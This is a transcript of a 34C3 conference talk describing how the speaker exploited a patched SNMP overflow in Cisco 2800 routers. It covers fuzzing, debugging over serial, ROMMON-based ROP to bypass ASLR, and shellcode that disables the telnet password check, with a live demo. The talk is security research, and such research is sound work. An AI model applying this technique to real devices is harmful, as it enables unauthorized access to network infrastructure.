34c3 intro Herald: All right, next lecture here is from Artem. Next to the fact that these, how would I spell it, earning a nice amount of money probably at a lab that's quite renown in the world as Kaspersky and from that point on he's not just looking in this lecture to exploit a development for Cisco stuff we all suffered from this last year or we all heard about it and don't know the impact maybe, but he's going to explain us the work he did on that field so please can I ask your warm welcoming applause for Artem Kondratenko, do you, okay good, please give him a warm applause and start. applause Artem Kondratenko: Hello everyone, so excited to finally be able to attend Chaos Communication Congress. Very happy to see y'all. So without further ado let's jump into some practical IOS exploitation. So a few words about myself, my name is Artem, I do stuff, mostly security related stuff but mostly my areas of expertise are penetration tests, both internal external and also do research in my free time and get a bug bounty here and there and this talk is actually kind of a continuation of my talk this summer at Def Con about Cisco Catalyst exploitation. So for those of you who are out of context, let's recap what happened earlier this year. So year 2017 was reaching vulnerabilities for Cisco IOS devices. So we had at least three major advisories for Cisco IOS that represented three remote code execution vulnerabilities. So the first one is vulnerability in cluster management protocol which resulted in unauthenticated remote code execution via telnet, second one is SNMP overflow and the DHCP remote code execution. In this lecture I'm gonna be talking about two of those vulnerabilities because DHCP RCE is yet to be researched. So hopefully by the end of this talk I'm going to be able to show you a live demo of exploiting the SNMP service in Cisco IOS. So but first what happened earlier: So on March 26, 2017 we had a major advisory from Cisco that announcing that hundreds of models of different switches are vulnerable to remote code execution vulnerability. No public code, no public exploit was available and no exploitation in the wild. So it was critical and main points of the vulnerability were as follow: So Cisco switches can be clustered, and there's a cluster management protocol built on top of telnet, and this vulnerability is a result of actually two errors, a logic error and a binary error. So the telnet options get parsed regardless whether the switch is in cluster mode or not and the incorrect processing of this cluster management protocol options result in overflow. So what is interesting about this vulnerability that actually the source of research for Cisco guys was another internal research. But the "Vault 7" leak that happened in March this year so many hacking techniques and tools were released to public by WikiLeaks, and among many vendors that were affected was Cisco Systems. So basically except for the advisory you could go to WikiLeaks and read about this potential exploitation technique for Cisco Catalyst. So basically these were notes of an engineer who was testing the actual exploit, there were no actual exploit in the leak. So basically this worked as follows: there was two modes of interaction, so for example an attacker could connect to the telnet, overflow the service and be presented with a privileged 15 shell. The other mode of operation was the … is to set for all the subsequent … connections to the telnet, there will be … without credentials so I did. We discover this exploit, full research was presented at DEFCON 25. I was targeting system catalyst 2960 as a target switch. I also described a PowerPC platform exploitation and the way you can debug it. You can look at my blog post about exploiting this service, and also the proof accounts of exploit on my github page. But today I want to talk about something else, about another vulnerability that was announced this year about SNMP remote code execution. So the actual motivation behind this research was that I was conducting an external pentest, and it was revealed an nmap scan revealed that a Cisco router where the default community string was available. So the goal was to get access to the internal network. So the actual advisory said that the attacker needs a read-only community string to gain remote code execution on the device. The target router was a 2800 integrated services router, which is a very common device on the networks. So the technical specs for it is it's a it has a MIPS big endian architecture, you don't have any client debugging tools for it available, and it's interesting in that sense that the firmware is relatively new for this router, and it might be interesting to look at the defensive end exploit prevention mechanisms employed by Cisco IOS. When I say relatively new is the interesting thing is that this device is actually end of support, it's not supported. So the last patch for it was came out at 2016, and to remind you the advisory for SNMP overflow appeared in 2017, in June 2017, but nonetheless this is still widely used device. If you search for SNMP banner on Shodan, you will find at least 3000 devices with SNMP service available with default public string. So this devices are all supposedly vulnerable to SNMP overflow. And the question is whether we can build a mount code execution exploit for it. So since we're going to be exploiting SME protocol, let's make a quick quick recap of how it works, just light touch. So SNMP comes with several abbreviations like MIB, which stands for management information base, and is kind of a collection of objects that can be monitored from the SNMP manager. And so a management information base actually consists of object identifiers. And as an example: you all know that printers usually use SNMP, For example if there is a certain level of ink in the cartridge, you can query the SNMP service on this device for the percentage of ink left. So that's a kind of example how it works. Management information base looks like a tree. So you have your base element at the top and your leaf elements, So all these elements represent an object that could be queried. We're going to be looking at get requests. And that is why the advisory states that for their vulnerability to be triggered you only have to know the read- only community string. So it's a relatively simple protocol, you just supply the object identifier you're querying and you'll get back the result. So here for example we get the router version, the description field. And you can also do this with a readily available Linux tools like snmpget. So before we will build an exploit, we have a starting point. So how do we look for for the crash? So the advisory actually states that there are nine different vulnerable management information bases and you only have to know the read-only community string. So for the fuzzing to be done I'll be using Scapy as a tool to as a toolkit to work with network protocols, and here you can see that I'm building an object identifier, a valid object identifier that references the description field, and then I'm appending some letters "a" which is 65 in ASCII table. Then I build an IP packet, I build a UDP packet and an SNMP packet inside of it with community string public and object identifier. So of course this will not trigger the overflow, because this object identifier is completely fine. How do we get all the object identifiers that our router will respond to? So basically there are two ways: you can take the firmware and just extract all the OIDs from it. It's easy to grab them, they're stored in plain text. Another way is to actually look at the vulnerable MIBs and visit the website OID views and get all object identifiers from this website. So as a matter of fact the first crash I had was in ciscoAlpsMIB, which is kind of related to airplane protocol, which does not concern us because it's not a focus of our exploitation. So the actual overflow was in one of its object identifiers. So this request this I actually crashed the router when you connect to the Cisco router of via a serial cable you will be and there's a crash you will be presented with a stack trace. So we see here that we got a corrupted program counter, and we also see the state of registers that we have at the moment of crash. So here you can see that we have control of a program counter, it's called EPC, and also we control the contents of registers s0, s1, s2, s3, s4, s5, s6. Further inspection also provided me with knowledge that we have 60 spare bytes on the stack to work with. But before we build we exploit we have some problems, issues to be solved. And that is: yes, we do control the program counter, but where do we jump to? Is ASLR on? Can we execute shellcode directly on the stack? Is stack executable? If we can place the shellcode on it, is data caching a problem for us? And if we launched our shellcode, can we just bash the code? Is the code section writable? Is the code integrity check on? But the most important question is: how can we return the code flow back to the SNMP service? Because IOS is a single binary running in the memory, and if you have an exception in any thread of this big binary, the Cisco device will crash. And if we look at the advisory, one of the indicators of compromised Cisco states is device reload, so exploitation of the vulnerabilities will cause an affected device to reload. We will build an exploit we'll try to build an exploit that will not crash the SNMP service on it. Before we dive deeper into the firmware I want to reference previous researches on this matter. This is by no means a complete list but these researchers actually helped me a lot and seemed interesting and very insightful to me. You should definitely check them out so for example "Router Exploitation" by Felix FX Lindener and "CISCO IOS SHELLCODE" by George Nosenko is a great resource for IOS internals and great reference to how IOS works in terms of exploitation and the third resource "How to cook Cisco" is a great info on exploiting PowerPC-based Cisco switches and also great info on bypassing common mechanisms and exploit prevention stuff in IOS. So basically if I were to tell you how IOS works in one slide it's basically a single binary running in memory. Everything is statically linked into a single ELF file which gets loaded on startup, of course you have no API whatsoever. Everything has no symbols whatsoever. Yes, there is a glibc library at the end of the firmware but it's also kind of hard to use it because you have so many different versions of firmware and the offsets jump and you don't know the exact location of those functions. So to start with static analysis you should probably copy the firmaware from the flash memory of the router. Use the copy command, it supports TFTP and FTP protocols so you download this firmware, the next thing you do is unpack the firmware. The firmware itself, when the router starts loading it, has an initial stop that does the unpacking but you don't have to reverse engineer that, you just use binwalk, that will do the unpacking for you. You load the result of unpacking with binwalk to IDA Pro, you have to change the processor type to MIPS 32 big-endian and we know that this is MIPS, because we saw the registers. These registers tell us that it was indeed MIPS architecture. So one thing I want to note, the actual firmware gets loaded into address 800F00 but the program counter is located at address 4 and this is because IOS when it loaded the firmaware transfers, I mean maps to memory 2400F00 and this is important because to have correct cross references in IDA Pro you have to rebase your program to 4 and after that you will have all correct string cross-references. We will have all the necessary strings and your static analysis setup will be complete. But in order to build an exploit it will not suffice to only have the, you know, IDA Pro loaded with the firmware with all the cross references, you probably want to, you know, set up a debug environment. It is well known that IOS can be debugged via a serial port and actually there's a "gdb kernel" command that is used to start the internal gdb server, or it was because functionality was removed in the recent versions of IOS and you can't really run the gdb. But nonetheless there's a way to enable the gdb and this way is to reboot the device, send an escape sequence to the serial line, this will bring up the rom monitor shell so rom monitor is a simple piece of firmware that gets loaded and run just before your firmware starts running and in this ROMMON you can manually boot your firmware with a flag and which will launch the whole firmware under gdb. And after your firmware is loaded, the gdb will kick in. Now you can't just use your favorite gdb debugger and Linux and connect it to IOS via a serial port because IOS uses a slightly different subset of commands of gdb protocol. It has a server-side gdb but the client side should be accustomed to this gdb server. Basically there is no publicly and officially available client-side debugging tools for IOS and that is because this is intended for Cisco engineers for to be done. Although there have been some efforts from the community to build tools to debug several versions of routers and switches with IOS and if you look for ways to debug Cisco IOS you will find, you most definitely will find a tutorial that says that you can actually patch an old version of gdb that still supports IOS, but it actually never works because I tried it and all I could do is read memory, the stepping, the tracing, it just doesn't work. So another way is to use a cool tool by NCC group, it's called IODIDE, it's a graphical debugger for IOS, it really works, it's a great tool, but the thing is it is only, it targets PowerPC architecture and it has some some problems you probably have to patch the debugger to be able to work with it and the third option, the last resort is to implement your own debugger for the router. And to do that you have to know which commands actually Cisco supports, and not a lot, so you can basically read memory and write memory and set and write registers and the only program counter control command is a step instruction. So basically it's kind of easy to implement such a debugger because all the information is just sent as a plain text over a serial cable and appended with a checksum which is just a CRC. So this way I was able to, you know, make a quick Python script using Capstone to be able to debug IOS, you can inspect registers, there's a basic breakpoint management, you just write a special control double word to be able to break. You can step over a step over step into and also a good feature is to be able to dump memory, which we will use later. So to find the overflow, the SNMP overflowing the code, how do you do it? Basically you can follow, since we have all the string cross-references, you can follow the strings, that reference SNMP get requests and just step until the crash, but a more efficient method is just to crash the device and start inspecting the stack after the device is already crashed. You just have to dump some memory on the stack and look into the values that reference the code, some of them will be return addresses and this will give you a hint where the crash actually is. So the actual program counter corruption happens in the function epilog, I call this function snmp_stack_overflow, so you can see here that at the end of a function we load the values from the stack to registers $s0 to $s6 and also we load value into register $ra and this is an important register, it's called a return address register and almost every function in MIPS uses this register to jump back to its parent function. So basically we have some space on the stack, but the question is can we place our shellcode on this on the stack? And can we execute it? Because, you know, stack location is unpredictable, every time you trigger this vulnerability a separate space on the stack is allocated and you cannot really predict it. So, no valid jump to stack instructions in the firmware like we did on Intel x86 like jump ESP. No such instructions in the firmware, but even if we could find such an instruction, the address space layout randomization (ALSR) is on, which means the code section and data section is based on different offsets each time we reboot the device, which means that we can't reliably jump to the instruction. And also an unfortunate thing is that data caching is also in place. So, about ASLR, this is the first first time I encountered the randomization in IOS. Previous researchers, that I've been doing with, they said a lot about diversity of the firmware. So, basically you had so many different versions of firmware when you exploited the Cisco device it couldn't really reliably jump to any code because there's so a vast diversity of different firmware that was built by different people but here we actually have the stack address based randomization and the text section and data section is loaded on different offsets after each reboot. So, another thing that really upsets us is data caching, so when we write our shell code to stack, we think that it will be on the stack but what actually happens, everything gets written into data cache and when we place our program counter to the stack we get executing garbage instructions which results in a crash once again. So this problem this is basically a data execution prevention, well it's not it's a it's a cache but the solution to this problem is the same as for data execution prevention and it is return oriented programming, so but unfortunately we still have ASLR so we can't really jump to anything because it's on a random offset but here the rom monitor, that I was talking about comes to our rescue. So this little piece of software that gets loaded before the actual firmware might actually help us. So the first thing we want to find where this bare-bones firmware is located and the interesting feature of this ROMMON shell, it's actually allowing you to disassemble arbitrary memory parts and if you target the disassembler at an invalid address you will get a stack trace revealing the actual address of the rom monitor. And what's the most interesting thing as the rom monitor is located at bfc0000 and you can dump it using the debugger or you can just search the internet for the version and download it. The most interesting part about this piece of firmware, is that rom monitor is located at the same address and it's persistent across reboots and it's really great because we can use it for building ROP chains inside of it. So now we have a theoretical possibility of circumventing ASLR, defeating the cache problem. So how do we build an exploit, so the overview is as follows: we jump to ROMMON, we initiate a ROP chain, which makes an arbitrary write using the code reuse technique and after that we have to recover the stack frame to allow the SNMP service to restore the legitimate code flow. This is really important because we will be writing only four bytes and that is not enough for a full fledged shellcode and if we don't crash SNMP we can exploit this vulnerability over and over again, thus building a shellcode in the memory. So after we build the shellcode we make a jump to it. So, here's how it works: we overflow the stack, we overflow the return address so it points to rom monitor, we jump to the rom monitor, then what we do we actually find a gadget that reuses the data on our stack to make an arbitrary four byte write just before the text section. Then we have to find a gadget that will recover stack for us so we can restore the legitimate SNMP execution call flow. So this is basically an overview of one cycle of how we write a four byte double word. Now, a little bit on building ROP chains, so what is it? what is return oriented programming? So basically the idea is to not execute the shellcode directly but is to use existing code in the binary to execute your payload. So you use stack not as a source of instructions but you use stack as data for the code that you're reusing. So basically you change the snippets of code we call them gadgets and you chain them together with jump or call instructions and candidate gadgets has to meet two requirements: It has to actually execute our payload and also it also has to contain instructions that will transfer execution flow to the next gadget or, if it's the last gadget it should transfer execution back to the SNMP service. The problems with the return oriented approach is that there is a limited set of gadgets available, so if you're talking about the firmware it's around 200 megabytes of code so there are plenty of different gadgets there, if we're talking about a rom monitor it's only 500 kilobytes of code, so not a lot of code available and the second major problem is that gadgets, because most of them are function epilogues, they modify the stack frame because they delete the local variables after they jump back to the parent function and you have to account for that because this, my crash, the process you are exploiting. ROP chains can be basically forced to do anything but mostly, most of the times we do arbitrary memory writes and this actually might lead to arbitrary code execution. So the idea for for looking for gadgets is that you find a gadget that loads data from the stack into the registers and then you find a second gadget that works with the data in the, in those pages for example you have one register $v0 which contains the value you want to write and the other gadget $s0 which has the address you want to write to. So we actually want to find gadgets that also load data from stack to return registers so we can jump to the next gadget. I don't have to look for these gadgets manually in IODIDE, in there are a lot of different tools for building ROP chains, one of those tools is Ropper you can find it on GitHub it's a really handy tool. You just search for necessary instructions to build the necessary ROP chain. So now the last technical part of how the ROP chains in this particular exploit work and then we'll get to the demo. So this is how a perfectly, you know, healthy stack frame looks like. So you basically have local variables on the stack, you have return adress, you also have a stack frame of parent functions underneath the stack frame of our vulnerable function. So when we overflow the local variables with our long object identifier here's what happens: We overflow the local variables and these variables actually partly get written to $s0 and $s6 general purpose registers we also, of course overflow the return address, which will jump for us to rom monitor and we also have some 60 bytes, after that we overflow the stack frame of the next function and we use that data also for our ROP chain. What we do here, we take the value of $a0, we control the value of $a0 as you remember and we move it to register $v0 and that's for only solely purpose because there are no other gadgets in rom monitor that use $s0 as a target register to write data so we have to use register $v0. After that the most important part is that we load the return address from the ROP data too and also we load the address we will write to from the ROP data too. So basically right now after this gadget stops executing we have $s0 points to a memory we want to write to and $v0 contains 4 bytes we will be writing just before the code section. So the final gadget that is performing the arbitrary write is the gadget that takes the value of register $v0 and writes it to a pointer reference that referenced by register $s0 and the last thing it does actually transfers the control back to the gadget, which will recover the stack for us. Most important gadgets it allows us to run the exploit several times, you might have noticed that the previous gadgets actually moved the stack pointer 30 bytes and hacks down them down the stack and this actually means that the process that we will return to will crash if we don't point the stack pointer just between two stack frames. We find a gadget that will move the stack pointer down to 228 bytes in hex, which will result in a perfectly healthy stack. Also we load the return address to register $ra and it points to the parent function that called our own vulnerable function so this way we perform an arbitrary four byte write. We can do this several times until our shellcode is actually built, just before the text section and the final thing we do, we overflow the stack again and jump to the shellcode. A few words about the shellcode: The device I was working with had a telnet service and it had a password, so I designed a simple shell code that will just patch the authentication call flow. So as you can see here we have a function "login password check" and a result which is in $v0 register is checked whether the authentication was successful or not. We can build a shell code which which will just patch this instruction which checks "login password check" and it will allow us to make a credential list authentication against telnet service. So what it does: basically the shell code inspects the stack and the return address in it to calculate the ASLR offset because, of course the ASLR is on for the code section and we want to patch something in it and after that it writes a 0, which is a nop instruction in MIPS, to a call that checks for password for telnet and also for enable password and then it just jumps back to SNMP service. So now the long-awaited demo. Let's see if I can make it a live demo. All righty, so here we have the serial connection to the device, you can see we have a shell. So what we do now, we inspect the password on the telnet service to make sure it's working as intended. So we see that bad passwords. We don't know the valid password for the device, what we do now is we launch the actual exploit, as parameters it takes the host, community and shell code in hex. So this is the shell code I was talking about that patches the code flow in authentication. So let's write sudo. So here you see that we initiate writing the four byte sequences into the text section. Basically this writes the shell code into the memory. So after the exploit finishes this, we just have to jump to the shell code. So let's see. Please do not crash. So, yes. So back to the slides. And of course you can build a shell code that will unset this behavior and patch the process back to enable the password and on the side notes how reliably can you exploit this vulnerability? So, of course the SNMP public community will leak you the version of the particular router but it does not leak you the version of ROMMON and we're basically constructing ROP chains in the rom monitor. So actually you have not that many versions of rom monitor available. You have only five if we're talking about 2800 router. So the worst-case scenario is just you crash it four times. It's not like you have to crash it four thousand times to you know beat the ASLR but there's a second option which is interesting. ROMMON is designed to be upgraded, so basically a system administrator can download a new version and update it but the thing is that read- only region that contains the stock ROMMON is always in place and it is always at the same offset, so even if you updated the rom monitor, the read-only version of it, the old version that always been there, will always be at bfc00000. So basically the assumption is that all the devices manufactured at the same time and place, they will have the same read-only rom monitor, you can query your serial number of your router using snmpget. So for example my lab router is manufactured in the year of 2008 and Czech Republic. So and it has the following version of rom monitor. So guys to, you know, to summarise about all this, do not leave default credentials on external networks. So public communities are not designed to be placed on external networks for the Shodan to find it. Take care of what you expose on the external networks. Of course patch your devices and watch for the end-of-life announcement by Cisco. Sorry? Sure why not? Alright guys thank you so much for your attention applause thanks for having me. Herald: I suppose there are some questions in this audience, please take a microphone if you can. no one on the internet? They are flabbergasted there it seems. Microphone number one. Mic 1: Yeah, I'm a random network admin and I know that people tend to use the same SNMP community on many of their routers. My view is that basically if you can get access to read only on those routers you will be able to hijack that or like use the same principle. So basically don't use the same SNMP community on all your devices that would be also something. Artem Kondratenko: the main thing is to update your routers because it's a patched vulnerability, the patch was released in September of 2017 but if you tend to use the end-of-life products like router 2800 you probably should use a strong community strength for it. Herald: Thank you. Someone else having a question there? Yes someone on the internet is alive. It's alive. Signal Angel: Let's try it. Yeah now I've actually got a microphone. The Internet is asking how much time did you put into this whole project? Artem Kondratenko: While working on this exploit consumed around I'd say four weeks. Four weeks from the discovering the device on the external network to the final exploit. Yes. Thank you. Herald: I have a question maybe for you as well. Is that you you're as well a lot of you have lots of volunteers who are working with you as well in researching these exploits or? Artem Kondratenko: Volunteers? Herald: Yeah I don't know. Artem Kondratenko: No, actually we don't have any volunteers, this is all part of my work. Herald: Okay. Thank you very much for thank you very much for this in its really revealing lecture, if someone wants to... Artem Kondratenko: Oh I just forgot to say, is my mic on? okay so the actual proof of concept and the debugger will be released in a few days, so the Python script with the capstone and the actual proof of concept I'll publish it and in a week or so. Herald: okay thank you. 34c3 outro subtitles created by c3subtitles.de in the year 2018. Join, and help us!